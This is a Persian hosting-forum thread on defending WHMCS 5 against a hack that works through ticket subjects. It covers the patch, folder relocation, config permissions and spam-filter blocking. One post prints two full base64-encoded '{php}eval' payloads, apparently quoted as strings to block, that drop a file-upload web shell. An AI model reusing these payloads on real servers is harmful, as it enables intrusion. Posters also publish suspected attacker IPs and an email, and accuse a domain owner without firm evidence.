پاسخ : هک شدن از طریق whmcs5
مگه یکی دو تا آیپیه؟
بعد خداتا وی فیی ان ریخته هر کی با اون میزنه
علاوه بر کارایی که من گفتم یه پیشنهاد دیگه اینه که از قسمت Spam Control در مدیریت whmcs این دو کد هک رو مسدود کنید
به همین راحتی
حتی کلمه ی php ببندین تا داخل سابجکت اجازه استفاده نداشته باشه
پاسخ : هک شدن از طریق whmcs5
اگر شما و سایر دوستان آی پی را محبت کنید هرچند ۱ یا ۲ و یا ۱۰۰ عدد باشد خود به ما کمک خواهد کرد.نوشته اصلی توسط maryam1
ضمنا اگر می شود یک بار آموزش کامل جلوگیری را مجددا در یک پست مجزا بفرمایید تا ما و دوستان بهره ببریم(اینگونه که هرکس یک چیز می گوید موجب گمراهی خواهد شد. اگر جامع و کامل باشد بسیار مناسب است)
پاسخ : هک شدن از طریق whmcs5
همکاران لطفا آی پی ها و ایمیل هارو اعلام کنند دوستانی قصد حرکت دسته جمعه به سمت دادسرای جرائم رو دارند
مرکز میزبانی وب نیک سرور NikServer.COM | شماره تماس : 9109.9713-021
هاست و نمایندگی هاست لینوکس | هاست و نمایندگی هاست دانلود | سرور مجازی ایران و اروپا
پاسخ : هک شدن از طریق whmcs5
به خدا بار ها این کارو کردم اما الان کامل مینویسم (فقط تشکر فراموش نشه)
اول از همه نصب پچ امنیتی که در آدرس زیر هست
Security Patch - WHMCS Forums
و دومین کار انتقال سه پوشه ی templates_c و attachments و downloads به لوکال یعنی جایی که به صورت پیش فرض بکاپ گرفته شده از سیپنل ذخیره میشه
بعد برید داخل فایل
configuration.php
و اونو به این شکل در بیارید
به جای username نام کاربری یوزر سیپنل رو بنویسیدکد PHP:<?php
$license = "Leased-00000000000000";
$db_host = "localhost";
$db_username = "0000000000000000000";
$db_password = "000000000000000000000";
$db_name = "0000000000000000000000000";
$cc_encryption_hash = "0000000000000000000000000000000000000";
$templates_compiledir = "/home/username/templates_c/";
$attachments_dir = "/home/username/attachments/";
$downloads_dir = "/home/username/downloads/";
?>
و کار آخر هم اینه که برید قسمت Spam Control درون مدیریت whmcs و تو قسمت سابپکت دو کد هک
وکد PHP:{php}eval(base64_decode(' JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRz hnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2 YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TF dSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhC c2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1 pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5U QWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSn pkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNi MkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMT kxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhB WTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WV cxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNk ZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVE lDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElI c2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3 ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8g PSBmb3Blbigia2lyLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJG NvZGUpOw=='));{/php}
را بلوک کنیدکد PHP:{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJq MGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdS aGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2 SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQ anhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lp QjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3 blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hs SjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dl eUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lI ME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5J K1BHSnlQaWM3SUgwTkNuME5DajgrIik7CiRmbyA9IGZvcGVuKCJkb3dubG9hZHMvYjB4LnBocCIs InciKTsKZndyaXRlKCRmbywkY29kZSk7='));{/php}
به همین راحتی
دسترسی فایل کانفیگم بذارید رو 444
فقط پچ رو علاوه بر جایی که
whmcs
رو نصب کردید داخل
include
هم نصب کنید
لطفا دیگه اسپم ندید تا این آموزش بمونه
اینم آیپی و ایمیل خرابکاران بعضی هاشون البته
31.7.61.22
46.19.139.252
takfile22@yahoo.com
188.158.211.136
ویرایش توسط maryam1 : December 10th, 2011 در ساعت 09:23
پاسخ : هک شدن از طریق whmcs5
سلام دوستان.
با کمک شرکت فراسو آی پی حمله کننده به ما نیز یافت شد: 188.138.100.80
طبق http://whois.domaintools.com/188.138.100.80، دامنه irrapid.com برای شخص هکر می باشد.
بزودی مراحل شکایت طی خواهد شد.
موفق باشید.
پاسخ : هک شدن از طریق whmcs5
مطمئنی ؟!
بعید میدونم . یه پیگیری دقیق تر از صاحب آی پی یا دامنه داشته باشید
ویرایش توسط nimo0ol : December 10th, 2011 در ساعت 12:24
برای فروش کالاهای جدید، روی طرز ارائه ی آنها تمرین کنید.
پاسخ : هک شدن از طریق whmcs5
چی بگم والا این قضیه هک شدنها خیلی دردسر ساز شده برای خیلی از هاستینگ ها
ویرایش توسط nimo0ol : December 10th, 2011 در ساعت 12:24
برای فروش کالاهای جدید، روی طرز ارائه ی آنها تمرین کنید.
پاسخ : هک شدن از طریق whmcs5
به نظرم برید تو پیام خصوصی بریزید رو سرو کله ی هم
نه پست هاتون به عنوان تاپیک میخوره نه چیز دیگه
ببینم دعواتون به کجا میرسه
پاسخ : هک شدن از طریق whmcs5
هر تاپیکی سر میزنی توش یکی با اونیکی داره دعوا میکنه!!
هاستینگ در این جد شغل جنجالی هست؟
تغییر نام گروه طراح و توسعه ...
پاسخ : هک شدن از طریق whmcs5
برای ما هم امروز از آی پی 173.236.125.246 تیکت زدند اما بدلیل نصب پچ مربوطه هیچ صدمه ای ندیدیم
در حال حاضر 1 کاربر در حال مشاهده این موضوع است. (0 کاربران و 1 مهمان ها)
مجوز های ارسال و ویرایش
